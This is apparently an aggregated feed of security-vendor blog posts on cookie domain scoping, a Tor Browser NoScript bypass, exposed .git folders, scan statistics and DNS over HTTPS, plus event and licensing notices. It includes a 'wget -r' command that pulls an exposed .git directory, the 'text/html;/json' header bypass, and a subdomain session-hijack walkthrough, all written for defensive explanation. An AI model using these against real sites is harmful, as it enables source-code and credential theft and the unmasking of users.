Quantcast
Channel: Invicti
Viewing all 1027 articles
Browse latest View live

Analyzing Impact of WWW Subdomain on Cookie Security

$
0
0

With the release of Chrome 69, Google opted to hide the www and m subdomains from the address bar, claiming that they’re not used anymore and therefore don't need to be displayed in the address bar.

Is the www subdomain really as trivial as Google claims? This apparently tiny detail means a lot for cookies, which allow the stateless HTTP protocol to become more dynamic and user-friendly. In this article, we discuss the necessity of the www subdomain from the cookie security perspective and make a few recommendations.

Analyzing Impact of WWW Subdomain on Cookie Security

A Short Introduction to Subdomains and Why We Use WWW

Today, HTTP – commonly referred to as the (world wide) web – has become the internet’s most popular protocol. Years ago, this wasn’t the case. The protocols used in a service were often specified as a subdomain, such as ftp.example.com, gopher.example.com, and mail.example.com.

There are various discussions about the necessity of the www subdomain. One aspect is the Same Origin Policy, which allows only web pages that are on the same domain to talk to one another. The www subdomain doesn't really affect this domain isolation though. This is because even if you share Second Level Domains (SLDs) with third-parties, such as ziyahan.example.com or mustafa.example.com (as is often the case with certain web hosts), they aren't permitted to access each other’s DOM or that of example.com regardless of the presence of www. However, if both ziyahan.example.com and example.com have pages that set the JavaScript's document.domain property to the value 'example.com', they can access each other's DOM.

The Domain Attribute of Cookies

Cookies, which began to be used in 1994, understand the concept of origin differently than the  Same-origin Policy (SOP), which would be designed a year later. Cookies may contain domain, path, expire and name attributes, and flags like httpOnly, and secure.

Let's examine the domain attribute in detail. The domain attribute specifies the domain for which the cookie is valid and tells the browser to which websites it can be sent with the request. It is an optional value, and in case it’s left empty, the domain name that the cookie is set to will be used. If you use an IP address to access the website, you’ll see this IP address in the value.

Website A cannot set a cookie belonging website B, even if they specify the domain attribute accordingly. Due to security measures, such attempts are blocked in both server and client side. However, a cookie may be used in multiple subdomains belonging to the same domain. For instance, a cookie set for example.com, may be sent along with the requests sent to mail.example.com, calendar.example.com, crm.example.com. The process is completed by comparing the cookies’ domain and the hostname of the requested URL using the Tail Comparison method. This method compares the URLs from the end to the start (right to left), and the matching cookies are sent with the request.

This is how you set the domain attribute:

Set-Cookie: Scanner=Netsparker; domain=example.com

This table shows a list of possible domain fields and to which domains the cookies will be sent by the browser.

The Domain That Sets the CookieThe Domains the Cookie will be Sent toThe Domains Cookie will not be sent to
www.example.comwww.example.com

*.www.example.com

example.com

art.example.com

other.example.com

art.example.comart.example.com

*.art.example.com

example.com

www.example.com

other.example.com

.example.comexample.com

*.example.com

As illustrated in the table, domains are very important in terms of cookie security, especially in the websites that have subdomains.

Before the cookie is sent with the request, the requested URL and the domain value of the cookies found in the browser memory (Cookie Jar) go through a comparison. The other criteria are checked only if the Tail Comparison results positively.

The different actions browsers take on this matter, the fact that the cookie domain isn’t grasped entirely, and the increasing trend of abandoning the use of www all add up to security breaches. We can illustrate this with an example.

Case Study of Setting Domain in Cookies

Let’s assume there are two accounts created on badsites.local:

  • victim.badsites.local
  • attacker.badsites.local

The users’ websites will be visible to those who visit these websites. If the user wants to make changes on their website, they have to login to badsites.local and make the necessary changes in the control panel.

The “victim” user logs in to their control panel. This is the HTTP request for logging in:

POST http://badsites.local/control.php HTTP/1.1
Host: badsites.local
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

username=victim&password=victim

The response from the server will have three forms depending on the domain value. We have to observe the reactions browsers give to these three different responses. The browsers used in this test are Chrome 69.0.3497.100, Internet Explorer 11, Mozilla Firefox 44.0.2, Edge 42.17134.1.0:

Case 1: Domain Value of the Cookie is Not Set

This is how a set-cookie header looks like if the domain parameter was not set.

HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=ock3keuidn0t24vrf4hkvtopm0; path=/;

The four major browsers react similarly to the missing domain parameter. Internet Explorer’s older versions (such as 11.0.10240.17443) add the cookie to all the requests sent to subdomains under badsites.local and cause a serious security breach.

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: tr,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: attacker.badsites.local
Cookie: PHPSESSID=ock3keuidn0t24vrf4hkvtopm0

If the victim, or any other user logged in to badsites.local, visits attacker.badsites.local, they will be able to take over the session on badsites.local via attacker.badsites.local.

Chrome, Edge, IE 11 (except some IE 11 versions that aren't up to date, i.e. 11.0.10240.17443)  and Firefox browsers will not send the cookie with the requests for the subdomains.

Case 2: Cookie Domain Value is Set as badsites.local:

As you see the domain parameter is now set for the main domain basites.local.

HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=1fr54qg3j9rf77toohcpcsk8h0; path=/; domain=badsites.local;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 66
Content-Type: text/html

IE, Edge, Chrome, and Firefox will add the cookie generated by badsites.local with the requests to attacker.badsites.local.

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: tr,en-US;q=0.7,en;q=0.3
Host: attacker.badsites.local
Pragma: no-cache
Cookie: PHPSESSID=1fr54qg3j9rf77toohcpcsk8h0

Case 3: Cookie Domain Value is Set as .badsites.local:

In this case the domain value was set to .badsites.local with a leading dot.

HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=q3a20kfes2u6fgvgsrspv0rpf0; path=/; domain=.badsites.local
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

IE, Edge, Chrome, and Firefox will add the cookie to requests made for attacker.badsites.local.

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: tr,en-US;q=0.7,en;q=0.3
Proxy-Connection: Keep-Alive
Host: attacker.badsites.local
Cookie: PHPSESSID=q3a20kfes2u6fgvgsrspv0rpf0

Importance of Cookies

In the cases we've examined, cookie domain values have to be set with great care. If the correct values aren’t supplied, your application might be at great risk. You can force the use of the www subdomain in all your domains. Doing so will allow the cookies to be added to www.badsites.local addresses even if you leave the domain value empty.

In situations where you have to host websites with multiple users, do not host potentially risky websites under your main domain. For example, websites that host multiple codes, like Github, host the processes under github.io instead of github.com.

Further Reading

Why you need a 'www'.

The definitive guide to cookie domains and why a www-prefix makes your website safer


NoScript Vulnerability in Tor Browser

$
0
0

Tor is the system preferred by users who wish to browse the internet anonymously. You can either set Tor up individually on your computer or mobile device, or in conjunction with the Tor Browser.

Tor Browser is careful to maintain your privacy by protecting your IP and fingerprint, which are used to differentiate you from other users. For instance, Tor Browser warns you when you try to maximize the browser window, since you can be tracked based on the viewport size and screen resolution.

Tor Browser might pay extra attention to user privacy, but even Tor developers make mistakes. A 0-Day vulnerability was found in the NoScript extension, which made it possible to expose the identities of Tor users. This article explains how this script blocking extension works, and how it exposes the private information of Tor Browser users.

Script Blocking Feature

One security feature of Tor Browser is that it blocks all scripts from loading unless you tell it to do otherwise. Script loading is blocked in all websites, besides the ones you whitelist, using the NoScript extension. This prevents your IP from being exposed by JavaScript code running on the page, such as a WebRTC connection request. All potentially vulnerable content, such as ActiveX controllers and flash objects, will also be blocked.

The activation of NoScript extensions is related to the Content-Type of the page. This is because if the NoScript extension comes across a context that can run scripts, such as a page that has the Content-Type set to text/html, the extension immediately prevents the Javascript code from running.


Script Blocking Feature

Running Scripts Even With NoScript Enabled

However, an alarming tweet by Zerodium on September 10 stated that a 0-Day vulnerability discovered in the NoScript extension might help expose the identities of Tor users.

Let’s take a brief look at the details of the vulnerability.

Details of the 0-Day Vulnerability in the NoScript Extension

The NoScript Safest extension blocks all JavaScript code in Tor Browser versions 7.x. However, it can be bypassed with a simple trick in the HTTP response, allowing the JavaScript files to run. The attack works when the attacker adds the following HTTP header in the response:

Content-Type: text/html;/json

It seems like the code responsible for blocking scripts from loading actually parses the Content-Type header incorrectly. When the code encounters the /json string at the end of the header, it believes that the context can't execute scripts anyway. Therefore it does not see the need to disable the script engine on that page.

Conclusion

NoScript Classic fixed this vulnerability in the 5.1.8.7 update. All versions of the Tor Browser from version 8.0 onwards included the updated version of the NoScript extension. Therefore, we recommend that Tor Browser users update their browsers immediately.

For further information, consult the Python Proof of Concept Code that exploits this issue, provided by the security researcher 'x0rz'.

How Does Netsparker Licensing Work?

$
0
0
  1. How can I activate my Netsparker installation?
  • You can activate your Netsparker installation using the License Key sent to you when you purchased Netsparker.
  1. How many activations can I have with a single Netsparker License Key?
  • You can have the same number of activations as the seats you have purchased.
  1. I need extra Netsparker license activations. What should I do?
  • Contact your Sales Representative to purchase extra seats to increase your License Key activation limit.
  1. How many websites can I scan with Netsparker Standard?
  • You can scan as many websites as you have purchased.
  1. I need extra websites for my Netsparker Standard license. What should I do?
  • Contact your Sales Representative to purchase extra websites to increase your license website limit.
  1. Where can I see and manage my current licenses in Netsparker Standard?
  • You can view and manage all your licenses in the Subscriptions dialog. From the Help tab, click Subscriptions.
  1. I purchased a Team or Enterprise solution. Can I also use your Netsparker Standard edition?
  • Yes, once you have logged in to your Netsparker Enterprise account, you can download Netsparker Standard, along with a separate key, from the Your Account>License window.
  1. I activated my license on a PC but I no longer have access to that PC (or it is inaccessible). How can I recover my Netsparker Standard license?
  • Contact our support team at support@netsparker.com to request a license deactivation. After our Support team examines your situation, we will deactivate the license on that PC so you can activate it on another one.
  1. I have lost my License Key. What should I do?
  1. I have noticed that my License Key is being used by an unauthorized third party. What should I do?
  • If you are suspicious that someone else is using your License Key, contact our Support team at support@netsparker.com as soon as possible. We can then deactivate and ban unauthorized access to your License Key.
  1. Can I use my Netsparker Standard installation with different users on the same PC?
  • The best way to do this is to purchase a license with multiple user activation support. If you have not already done that, contact your Sales Representative to update your license.
  1. How do I request a Trial License?
  • You can request your trial license by completing our Get Demo form. Once you complete the form, Netsparker Standard will start to download. When the installation is complete, you can simply click Start Trial to begin using your 15-day Trial License.
  1. What websites can I scan using my Trial License?
  • You can only scan our test websites using your Trial License (php.testsparker.com, aspnet.testsparker.com).

The Dangers of Open Git Folders

$
0
0

Finnish computer scientist, Linus Torvalds, changed the world twice in his lifetime. The first time was roughly 25 years ago when he wrote the Linux kernel; the second was when he developed the revolutionary Git – the open source, distributed version control system (VCS).

Git is a great system. However, if you mistakenly deploy the version control system files of your web application in a mode that makes them publicly available, along with your entire website, that could mean game over! In this imaginary scenario, your website’s source code, API tokens, database access passwords would be retrieved by attackers before you take them down.

Vladimir Smitka is a Czech security researcher who released his research notes in open Git version control system files. His goal was to identify how common it is to find easily retrievable websites' open Git repositories. In this article, we will take a look at the security risks posed by version control system files, and the solutions in light of Smitka’s research.

Dangers of Open Git Folders

How Prevalent Are Open Git Folders?

Let’s begin by analyzing the statistics in Smitka’s research notes:

  • After a two-day long scan of Czech websites, he discovered that 1950 out of 1.5 million websites with their Git folder open to public.
  • Smitka then conducted a scan of Slovakian websites, uncovered 930 websites with their Git folder open to public

Smitka then enlarged his scope:

  • He scanned 230 million domains over four weeks, with a cost of only $250 – surprisingly inexpensive, considering the potential financial impact of just one breach
  • This global research resulted in a further list of 390 thousand domains which had their  Git directories exposed
  • He compiled a detailed list of the specifications of the scanned domains at risk, which included a staggering 189,472 .com domains, followed by 85,202 .top domains

Smitka further enhanced his research by categorizing the results by the technology they used. He reported that vulnerable websites mostly used PHP and Apache servers – not surprising, given the prevalence of these technologies.

The Structure of Git

Let's now look at the structure of Git directories and folders.

This is an xkcd comic, supplied on their website under a Creative Commons license.

When you generate a Git repository (repo) using the git init command, a hidden directory with the name '.git' is created in the Git folder. Similarly when you clone a repo, you’ll see that a '.git' directory is also cloned in the repo folder. The .git directory should not be changed if you're not familiar with Git. It’s a sensitive directory that has all the necessary information and files for Git to work, such as the commit history and previous and current versions of the files.

This is a sample .git directory.

├── HEAD
├── branches
├── config
├── description
├── hooks
│ ├── pre-commit.sample
│ ├── pre-push.sample
│ └── ...
├── info
│ └── exclude
├── objects
│ ├── info
│ └── pack
└── refs
├── heads
└── tags

In this example, the attacker would have access to all the source code for the website if they could reach the Git repository – including the current and previous versions of the code. Simply put, the .git folder should never be deployed, and if it is, it should never be open to public access.

How to Check if Your Git is Open to the Public

There are several ways to find out whether the .git folder is accessible to the public.

  • One of the easiest ways to do this is by trying to access it by navigating to it via the browser (www.example.com/.git/).
    • If the git folder is left in the server by mistake, and directory listing is enabled on your server, this URL will display a list of the contents of the directory.
    • If directory listing is disabled, you might get the 403 error, since the default visible files index.php or index.html are missing in the git directory. But this does not mean that everything is OK.
  • Another way to find out whether the folder is open or not is by accessing the URLs www.example.com/.git/HEAD or www.example.com/.git/config.

Since information on the folder structure of Git is widely available, the attacker won’t have any difficulty  in finding the code once he’s in the directory. There are also many automated tools to help the attacker.

Once the existence of the Git folder is confirmed and directory listing is enabled, it is simply a matter of downloading it using wget in recursive mode:

wget -r http://www.example.com/.git/

If directory listing is disabled you can use one of the readily available tools that allow you to download the folder.

How to Protect Git Folders From Attackers

  • Don't leave your .git folder in the production environment! If you can’t do that, you should at least move it out of the root directory, because the web servers are programmed to provide the files in the web root directory only.
  • Another method is to block access to all directories that begin with '.' However, the “.well-known” directory is the exception. This directory is defined by RFC 5785 and is used to hold the metadata of the website, such as DNT, Let’s Encrypt validation, and security.txt files. Therefore when you’re setting a rule to block access to files and folders that begin with “.” you should take the following exceptions into consideration:

Nginx:

location ~ /\.(?!well-known\/) {
deny all;
}
 
Apache:
<Directory ~ "/\.(?!well-known\/)">
Order deny,allow
Deny from all
</Directory>

Caddy Server:

status 403 /blockdot
rewrite {
r /\.(?!well-known\/)
to /blockdot
}

Conclusion

In light of Smitka's research, it appears that open Git folders remain a glaring global web application security problem that has not yet been seriously addressed. For now, applying the proper restrictions regarding files that begin with a dot character, as suggested above, will help protect the sensitive .git directory, preventing a large scale takeover of your website. It is important to be sure that you know where your website's folders and files are and whether they can or cannot be accessed by malicious hackers.

If you'd like to find out more about the research that inspired this blog post, see Global scan - exposed .git repos.

Netsparker to Exhibit at OWASP AppSec USA 2018 in San Jose

$
0
0

Netsparker is sponsoring and exhibiting at OWASP AppSec USA 2018. The conference exhibit will take place from October 11th until the 12th at the Fairmont San Jose.

OWASP AppSec USA 2018 - Sponsored by netsparker

Join Us at the Diamond Sponsor Booth at OWASP AppSec USA 2018

If you are attending OWASP AppSec USA, stop by our Diamond Sponsor booth. Our team will be happy to talk to you and answer any questions you might have about automated vulnerability scanning and scaling up web application security.

For more information about the conference, visit the official OWASP AppSec USA 2018 website.

$100 Discount Code for OWASP AppSec USA 2018!

If you don't yet have your OWASP AppSec USA tickets, use the code USA18NTSPKR100 when registering to get a $100 discount.

We look forward to seeing you there!

Netsparker's Web Security Scan Statistics for 2018

$
0
0

On average, the online edition of the Netsparker web security solution identifies a vulnerability every 4.59 minutes. Since its launch in early 2015 it identified a total of 156,904 security issues. Since the beginning of this year until the fifth of October it detected 87,195 vulnerabilities across 4,469 total websites.

Netsparker Scan Statistics 2018

If that doesn't make you want to start scanning your web applications for security issues right now, we don't know what would.

We are always curious about what technologies Netsparker users employ to build their web applications, and keen to stay ahead of the hackers. So we extracted data from the online edition of Netsparker and here is our report.

Identified Vulnerabilities Since the Beginning of 2018

Table of Content

  1. How Many Vulnerabilities Does Netsparker Detect and Verify?
    1. How does Netsparker Confirms The Vulnerabilities?
  2. What Types of Technologies Do Netsparker Users Operate?
  3. What Type of Security Vulnerabilities Where Detected?
    1. Cross-site Scripting
    2. SQL Injection
    3. Out of Date Software
  4. Adoption of Client-side Web Security Features
    1. SSL / TLS Issues
    2. Content Security Policy
    3. Subresource Integrity
    4. Other Security Checks Using HTTP Headers
  5. What Do These Web Application Security & Vulnerabilities Statistics Say?
    1. XSS vs SQL Injection
    2. Out of Date Software Is A Big Issue
    3. Security Beyond The Code - Use All Resources Available
  6. How Much Time and Resources Does it Take to Identify a Single Vulnerability?

How Many Vulnerabilities Does Netsparker Detect and Verify?

To start off with, 50,489 (32.18%) of the vulnerabilities Netsparker identified were categorised as High Severity and are critical issues. This should give you some idea of the statistics to follow.

An interesting fact is that out of the 156,904 vulnerabilities Netsparker identified, 30,164 (19.2%) of them have a probable/possible status. And around 80.8% of all the identified vulnerabilities have been confirmed automatically with the Proof-Based Scanning™, which means they are definitely not false positives.

 Total number of vulnerabilities identified by Netsparker

How does Netsparker Confirms The Vulnerabilities?

Netsparker pioneered and uses an exclusive technology called Proof-Based Scanning™. When Netsparker identifies a vulnerability it tries to automatically verify it by exploiting it in a read-only and safe way. And if a vulnerability is exploitable, then it is definitely not a false positive.

Upon exploiting the vulnerability the solution also generates a proof of exploit, highlighting the impact the exploited vulnerability could have on the target website. Netsparker can auto exploit vulnerabilities that have a direct impact and are difficult or require technical expertise to reproduce, such as SQL Injection, XSS, Code Evaluation and second order vulnerabilities.

Non direct impact vulnerabilities, such as IP address or email address disclosure cannot be automatically verified. Though someone can verify these type of issues very easily verify without requiring any technical expertise.

So by automatically verifying 80% of the identified vulnerabilities, Netsparker is helping businesses save days and weeks of man hours, thus allowing small teams to do much more and ensure the security of their web applications with much less resources.

What Types of Technologies Do Netsparker Users Operate?

We examined the types of web servers and technologies Netsparker users operate. We found that Apache and IIS were by far the most commonly used web servers, while PHP and .NET were the most popular web app technologies.

Technologies and Web Server Types Identified

What Type of Security Vulnerabilities Were Detected?

Cross-site Scripting

Cross-Site Scripting (XSS) has been around for a very long time and is known by almost all developers. So it's surprising that it accounts for around one quarter of all detected vulnerabilities, a total of 40,908 issues. 1,269 of the detected XSS were DOM XSS. Cross-site scripting vulnerabilities are very difficult to get rid of, though they are very easy to detect automatically with the Netsparker web security solution.

Cross-site Scripting

SQL Injection

Netsparker detected 3,441 SQL injection vulnerabilities, which make up just over 2% of the whole. Given that SQL was once so prevalent, and it is still the top vulnerability in the OWASP Top 10 list of most critical web application security flaws, these are impressive results. It seems that new frameworks and prepared statements may all have played a role in reducing this proportion. In addition, though we see less classic SQLi vulnerabilities and encounter more complex variants of this injection, such as Boolean, Blind, and OOB, all of which make up part of this number. Exploiting those types is much more difficult and only something an experienced hacker would tackle.

SQL Injection

The Netsparker web application security solution always generates a proof of exploit when it identifies a SQL injection vulnerability, meaning there is no need to manually check that a detected vulnerability is exploitable.

Out of Date Software

Clever, malicious and driven hackers aside, out of date software is still a big issue, even though it is one of the quickest and easiest security gaps to close. Equifax and Mosaic Fonseca made international news, yet….

Out of Date Software

Out of date software accounts for approximately 5% of all security issues. The severity varies,  though:

  • Since launch, Netsparker has detected 8,775 Out of Date Software issues
  • 1,221 were outdated web server software
  • 70 were out of date database servers.

Site owners should assume nothing and update their software as soon as updates become available.

Adoption of Client-side Web Security Features

Nowadays there are plenty of new defense in depth features developers can utilize to improve the security of their web applications such as Subresource Integrity and Content Security Policy. If not implemented, it does not necessarily mean the web applications will have a specific vulnerability, though Netsparker will report if they are missing or misconfigured because they are recommended best practises.

Other Non Web Application Security Issues

SSL / TLS Issues

It is quite surprising that we are still seeing these type of SSL / TLS issues, especially when HTTPS is almost becoming the de facto protocol for web. Netsparker discovered:

  • 960 issues with mixed content over HTTP/HTTPS
  • 545 invalid SSL certificates

Content Security Policy

Content Security Policy (CSP) is a relatively new standard, though it gained a lot of popularity. It can be a bit of a task to configure CSP properly, and an insecure configuration can lead to some security issues. From the scans we can see that:

  • 4,067 sites do not have CSP enabled
  • There were 5,792 issue with the CSP implementations of the scanned applications

Subresource Integrity

Subresource Integrity (SRI) should be implemented on every web application that loads scripts and other third party code from CDNs and other third party sources. SRI is used to ensure the code loaded from third parties have not been altered, hence it is very important and allows you to trust more 3rd party websites with less worry. Out of the 4,469 targets scanned, 1,912 did not have SRI implemented.

Other Security Checks Using HTTP Headers

There are a number of security features that can be used in web applications to protect against exploitation of cross-site scripting (XSS) vulnerabilities, to ensure integrity of issued encryption certificates and more. Below are some of the issues Netsparker highlighted in target web applications:

  • Expect CT HTTP Header issues: 4,069 (2,111 of which because the header is not enabled)
  • Missing X-Frame-Options Header: 2,809
  • Missing X-XSS Protection Header: 4,297

What Do These Web Application Security & Vulnerabilities Statistics Say?

There are several conclusions one can come up with after studying these statistics. Here are some of our thoughts on these numbers.

XSS vs SQL Injection

Injection vulnerabilities have occupied the number one spot in the OWASP Top 10 list of most critical security flaws since it started. However, from all the statistics we’ve gathered (not just this one) Cross-site Scripting (XSS) is always by far a much more common vulnerability. Though this should not be to a surprise because nowadays, developers have a lot of resources to write code that is not vulnerable to SQL Injections, such as prepared statements. New frameworks by default protects against SQL Injection and makes it quite hard to write insecure SQL code. On the other hand XSS vulnerabilities are much more complex to address and even when the framework has built-in protection, it's very easy to make mistakes.

Out of Date Software Is A Big Issue

It is impossible not to have third party frameworks, libraries or code in a custom built web application. Why not? Why should you reinvent the wheel when you can simply plug in new code and functionality?

Though these third party frameworks, code snippets and libraries can also have vulnerabilities, so it is important to keep them up to date. This should be one of the easier security best practice to follow - keeping software up to date - yet many are failing at it, as we have seen in the Panama papers leak and Equifax’s massive data breach.

Netsparker is a web security solution that can help you with this. It has a dedicated scanning engine for off-the-shelf components, such as libraries, frameworks and other third party code you might be using on your web applications. If Netsparker identifies a vulnerability in any of these components, it highlights the issue so you can update the software.

Security Beyond The Code - Use All Resources Available

TLS, Subresource Integrity, Content Security Policies and several other security features can help you build more secure web applications and web servers. Some of them are very easy to integrate and can definitely save you a lot of hassle. Defense in depth is something that you should always strive while building a security.

For example when the CDN used by Associated Press, The New York Times, CNN and the Washington Post mobile site was hacked, if they were using Subresource Integrity their readers wouldn’t have got messages from the hacking group Syria Electronic Army (SEA). So go ahead and use such security measures, though always scan the setup with Netsparker because a misconfiguration can render these features useless and give false sense of security.

How Much Time and Resources Does it Take to Identify a Single Vulnerability?

We can go on forever on what the above numbers mean, though the most important one that really makes a big difference and helps your security team identify and fix as many vulnerabilities as possible is the fact that 80% of the identified vulnerabilities were verified. What does this mean?

Netsparker is the only solution that employs Proof-Based Scanning™ to prove that a vulnerability is not a false positive. How effective do you think such feature is? How many resources (financial and manpower) can businesses save with it? Try this little exercise to find out how much time you need to identify a real vulnerability:

    • Think of how long it takes to conduct a vulnerability assessment on all your web applications
    • Add on the amount of time it took your seasoned security consultants or team to manually verify the identified vulnerabilities and document all info into a report so developers can fix it
    • Divide that time by the number of actual vulnerabilities or issues you discovered

Now you should have a very rough estimate of how long, on average, it takes you to discover a vulnerability and figure out what to do with it. If the figure you came up with is measured in days rather than minutes – soul-destroying, we know  – you can guess what's coming next.

With Proof-Based Scanning™ you do not need to do the second step mentioned in the above exercise, which, is the most time consuming part that requires most technical expertise. The solution does it all for you.

Just a reminder that Netsparker finds a vulnerability every 4.59 minutes! It also provides a scan summary, technical report, downloadable scan data, proof of exploit, and a list of issues along with their impacts and remediation details.

Manual vulnerability testing sounds a little crazy when you realise just how much time you could save by using the Netsparker web application security solution.

Authors, Netsparker Security Researchers:

Sven Morgenroth
Ziyahan Albeniz
Robert Abela
Dawn Baird

Netsparker to Exhibit at Black Hat Europe 2018 in London‎

$
0
0

This year, Netsparker will exhibit at Black Hat Europe 2018 in London‎. The Business Hall will be open from December 5th until the 6th at Excel London‎.

Black Hat Europe 2018 - Join Us at Booth #802

Join Us at Booth #802 at Black Hat Europe 2018

Members of our team will represent Netsparker at booth #802. Our team will be available to answer any questions you might have about automatically detecting vulnerabilities in your websites and web applications.

Visit the Black Hat Website for a copy of the agenda and more information about the event.

We look forward to meeting you there!

Pros and Cons of DNS Over HTTPS

$
0
0

DNS, also known as Domain Name System, is the internet-wide service that translates fully qualified hostnames (FQDNs) such as www.netsparker.com into an IP address. It was developed because it's much easier to remember a domain name than an IP address.

In 2017, an internet draft to send DNS requests over HTTPS was filed to the IETF by P. Hofmann (from ICANN) and P. McManus (from Mozilla). Was this a positive move toward a more secure internet, or will it only create more problems?

Pros and Cons of DNS Over HTTPS

In this article we dig deep into the subject, explaining our angle on the pros and cons of running DNS over HTTPS.

What is the DNS and How Does It Work?

First, let's refresh our memories on how DNS works. When you visit https://www.netsparker.com the following happens:

  1. Your browser sends a request to a recursive domain name server (DNS) that is configured on your computer. Let’s call this DNS server 8.8.8.8.
  2. Since 8.8.8.8 does not know the IP address of www.netsparker.com, it queries the internet root servers, which refer 8.8.8.8 to the nameserver responsible for the .com top level domain (TLD).
  3. Next, 8.8.8.8 asks the .com TLD name server for the name servers of the netsparker.com domain.
  4. Then, 8.8.8.8 asks the netsparker.com name servers for the IP address of the FQDN www.netsparker.com. Once the server gets the response, it forwards it to the web browser.
  5. The web browser connects to this IP address and requests the website www.netsparker.com.

How Far Does DNS Lag Behind?

Back in 1983, when DNS has just been invented, DNS requests and responses were sent over the internet in clear text, and they still are. Now, with so much at stake on the internet, there is an additional need to encrypt DNS traffic.

However – like many other fundamental building blocks of the modern web – DNS was not ready for the hype!

Unlike other protocols such as HTTP and FTP, DNS never got a security upgrade that prompted widespread adoption. Instead, one of the most important features of our modern internet has used the same level of encryption for the last 35 years – none at all!

Introducing DNS Over HTTPS

In 2017, following years of unencrypted DNS requests, the first IETF Internet Draft (I-D) for DNS Over HTTPS (DoH) was published. It was a precursor to an official RFC document, and you can the 13th revision of the initial draft (DNS Queries over HTTPS (DoH), though its RFC is not yet finalised. It isn't the only protocol that aims to add encryption to the DNS protocol (there is also DNS over TLS and DNSCrypt), but it's the one that companies such as Mozilla and Google chose to integrate into their products.

Let's take a look at how it works and why it's probably not the solution to all DNS privacy problems.

DNS over HTTPS – Technical Basics

First, let's look at the technical aspects described in the latest Internet Draft and implemented in real-world applications.

The client sends a DNS query via an encrypted HTTP request – not a shocking revelation, given the name of the protocol. There are two possible ways to send the data – via a GET or POST request. Each has its own characteristics and advantages.

GET and POST Requests

If you send the data via a POST request:

  • The Content-Type header field indicates the media type:
    • The I-D describes one media type (application/dns-message), but the major DoH providers we'll talk about use another one (application/dns-json) that is better suited for web applications.
  • The DNS query is sent in the message body:
    • This has the additional advantage that you don't need to encode the message
  • The message size is smaller than sending it with a GET request:
    • As described above, this has to do with encoding

If you send the data via a GET request:

  • It's bigger than a POST request:
    • The encoding that you need to use is base64url, which means that the encoded message is about one third larger than the original one
  • It's HTTP Cache-friendly:
    • Caching GET requests is well supported even in older cache servers
  • The DNS query is sent in a GET parameter
    • This is not surprising, since the I-D mentions 'dns' as the GET parameter name

However, even though GET requests are more cache-friendly than POST requests, there is still one problem. Usually DNS packets have an ID field, that is used in order to correlate request and response packets. It is a unique, random identifier that results in different request URLs for what is essentially the same request. Therefore, clients should set this ID field to '0'.

This demonstrates that porting DNS from cleartext UDP/TCP to encrypted HTTPS requires some adjustments, at least if you want to use HTTP's full potential (which is advisable since HTTPS comes with quite a bit of overhead compared to the simple, unencrypted wire protocol of DNS).

Is Today's Web Ready for DNS Over HTTP?

Now that you know some of the important technical details regarding DNS over HTTP, what about the infrastructure of DoH?

Let's keep in mind that this technology is still in an experimental state and there is a lot of old DNS infrastructure that doesn't support encryption. Could you even deploy DoH when most of the name servers out there don't encrypt their DNS responses? Does DNS over HTTPS even make sense? And wouldn't you need to change how browsers or operating systems work in order to use it?

It turns out that it's not really necessary to update everything, even though the latest, nightly Firefox build added support for DNS over HTTPS. This is a recent, bleeding-edge version that may contain features that aren't yet available in the latest stable version. And Google's Android Pie is going to have a built-in DoH feature.

There is a way to use DoH without an operating system or browser update, though. Obviously, you should keep browsers and operating systems updated, but let me tell you why it will take a long time for most people with an Android phone to use DoH (even though Google added it in Android Pie).

Why You Won't See Native DoH on Your Android Phone for a Long Time

From painful personal experience, I can explain. Some time ago, I bought a new Samsung smartphone. Then Google released a new Android version. The update included a cool UI overhaul and some new features.

Then I waited. Yet month after month, my screen informed me, "Your phone is up to date". This annoying delay was down to the fact that Samsung heavily customizes Android on their own phones. Back then, their version of Android was called TouchWiz and it was full of bloatware. Following complaints, they slowly removed most of the annoying features and software, to the point where people couldn't recognize it as TouchWiz anymore and they had to rename it. (I'm not making this up.) Even though now they have a few fewer Samsung-specific features that they need to adjust to new Android versions, it still takes much too long to get a new update.

A friend of mine had a much older Android device from the same manufacturer and always had the latest Android version installed. That's because he flashed a new CyanogenMod operating system to the phone. It was third-party software that didn't have the TouchWiz UI, but it was the latest Android version that was available. Other problems aside, it's ironic that you could get a fully-patched, up-to-date phone by flashing third party software a few days or weeks after Android published it, yet you needed to wait months for your phone manufacturer to do the same. Obviously, doing that would void your warranty and the average user won't even be aware such a thing is possible. So, even though Android 9 will have DoH support, it may take months or even years for you to be able to use it.

Is There An Alternative Way to Use DoH Even Though Your OS or Browser Doesn't Support It?

There are several options:

  • You can install a DoH proxy on the name server in your local network, which means that your device still sends traditional, unencrypted DNS packets to the local name server. However, that server will query DNS over HTTPS servers on the internet in order to resolve your query, which enables you to use DoH without having to modify your system. Still, it's unencrypted within your local network.
  • It's also possible to install a DoH proxy on your local system, even though I'm not sure if it's possible for Android phones. Using this technique, instead of relying on a second machine in the local network, the proxy runs on the same machine as your browser. Therefore, even if you have an attacker in your local network, he can't read your DNS requests since they are already encrypted once they leave your machine.

Does DNS Over HTTP Enhance Security and Privacy?

It's up for debate. There are some problems with DoH that are worth a mention. The first of these, due to the way DNS works, is that it's almost impossible to have an end-to-end encrypted connection from your browser to example.com's name server, without making it known to intermediate servers.

Let's recap by looking at how the recursive name server from our earlier example resolves the IP for www.example.com:

  1. It asks one of the internet root servers:
  • Question: "I want to visit www.example.com, do you know where it is?"
  • Answer: "No, but here are the nameservers for .com. Try your luck there!"
  • Then it asks the .com name servers:
    • Question: "So, can you tell me www.example.com's IP address?"
    • Answer: "You should ask the example.com name servers."
  • Finally it asks the example.com name servers:
    • Question: "What is the IP of www.example.com?"
    • Answer: "The ip is 123.123.123.123"

    In each of these queries, the full hostname is sent to the DNS server. All of these servers now know that you want to visit www.example.com, even though this information is only of real interest to example.com's name server – obviously less than ideal in terms of privacy.

    DNS Query Name Minimization

